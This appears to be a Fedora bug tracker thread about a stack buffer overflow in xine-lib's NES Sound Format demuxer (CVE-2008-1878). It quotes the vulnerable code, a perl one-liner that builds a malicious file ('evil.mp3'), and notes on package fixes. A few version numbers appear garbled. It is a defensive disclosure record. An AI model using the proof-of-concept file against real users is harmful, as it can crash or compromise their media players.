Guido Landi reported following xine-lib issue to Full-Disclosure mailing list:
xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES
Sound Format demuxer(demux_nsf.c).
109: this->title = strdup(&header[0x0E]);
122: char title;
162: sprintf(title, "%s, song %d/%d",
this->title, this->current_song, this->total_songs);
- Affected applications
perl -e 'print "\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" .
"\x41" x 114' > evil.mp3
Does not seem to be fixed upstream yet. Overflow is caught by stack protector.
Created attachment 302736 [details]
Exploit is now also on milw0rm:
Secunia advisory ChangeLog message refers to:
xine-lib-184.108.40.206-1.fc7.2 has been submitted as an update for Fedora 7
xine-lib-1.1.12-2.fc8 has been submitted as an update for Fedora 8
Another issue was reported as affecting nsf demuxer, however, it was disputed as
invalid shortly. CVE id CVE-2008-1964 was assigned anyway:
** DISPUTED **
Stack-based buffer overflow in the demux_nsf_send_headers function in
src/demuxers/demux_nsf.c in xine-lib allows remote attackers to have
an unknown impact via a long copyright field in an NSF header in an
NES Sound file, a different issue than CVE-2008-1878. NOTE: a third
party claims that the copyright field always has a safe length.
xine-lib-1.1.12-CVE-2008-1878.patch applied to Fedora packages adds more
explicit limits on copyright field length.
xine-lib-220.127.116.11-1.fc7.2 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
xine-lib-1.1.12-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
This issue was addressed in: